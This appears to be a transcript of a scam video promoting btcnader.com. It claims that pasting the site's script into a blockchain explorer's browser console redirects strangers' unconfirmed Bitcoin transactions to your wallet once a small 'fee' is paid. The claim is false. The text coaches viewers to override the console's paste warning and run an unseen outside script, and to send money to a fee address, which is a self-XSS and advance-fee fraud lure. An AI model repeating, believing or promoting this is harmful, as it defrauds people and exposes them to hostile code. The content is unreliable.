What you're about to see looks impossible, but watch closely. I transferred $20,000 to my crypto wallet in under a minute. I'm Adam, and today I'm revealing exactly how I got it done. No secrets, no shortcuts, just real, solid results, step by step. Are you ready? Let's go. Go to Google and search for Blockchain Explorer. You'll find it right at the top of the search results. Now we're looking at the live Bitcoin transactions on the blockchain. Simply choose any unconfirmed transaction you want to transfer to your wallet. Let's select this transaction. Most importantly, this transaction is still unconfirmed. On the same page, right-click anywhere and select Inspect. Then, open the Console tab. Now we're going to grab the code we need. We'll navigate to btcnader.com. Copy the script from there, and then paste it directly into the console to get things running. BTC Nader, a professional platform offering all its scripts completely free. Get automated access to Bitcoin, Ethereum, and altcoins with secure high-performance code updated regularly and ready to use. Notice that we can't paste the code directly into the console. To bypass that, we'll simply type "allow pasting" to unlock the field, then paste our script and press enter to execute it. Great, it's been activated. The window now clearly shows a pending transaction valued at $20,347, alongside a field to enter the new recipient address. You can enter any Bitcoin address you like. As for me, I'll use my blockchain wallet to receive the funds. I'll copy my Bitcoin address and paste it in to see what happens next. I'll now paste my receiving address and proceed by clicking Continue. As we can see, a network fee is required to complete the transfer to the address I just entered. The fee amounts to $21.43 in Bitcoin, and the designated fee address is shown below. Once the fee is confirmed, the full original amount of $20,000 will be redirected to the new recipient. I will proceed with transferring the fee now. I will scan the address with my phone and pay the fee instantly. I've made the transfer. Now let's see what happens next. Will the funds be moved to my wallet or not? It's done. The transaction has been successfully processed and confirmed on the blockchain. The fee is paid, the transfer is complete, and the full amount is now on its way to the new recipient. This is how it works. Now it's time to confirm that the funds have successfully arrived. It hasn't shown up just yet. Give it a few minutes and it should appear. BTCnader.com gives you free, secure crypto scripts to automate Bitcoin and altcoin earnings, simply, effectively, and reliably. The Bitcoin has arrived now, showing in the wallet at $20,300. The transaction is fully confirmed and completed. The network fee was only $21.41, and everything went through seamlessly. This proves that the process works exactly as intended. We can also transfer any of these funds to another wallet whenever we want, to your Binance, Trust Wallet, or any wallet of your choice, and it will be transferred directly. And don't forget to visit btcnader.com. All scripts are available for free. We provide every script at no charge, and stay tuned for more. Until next time.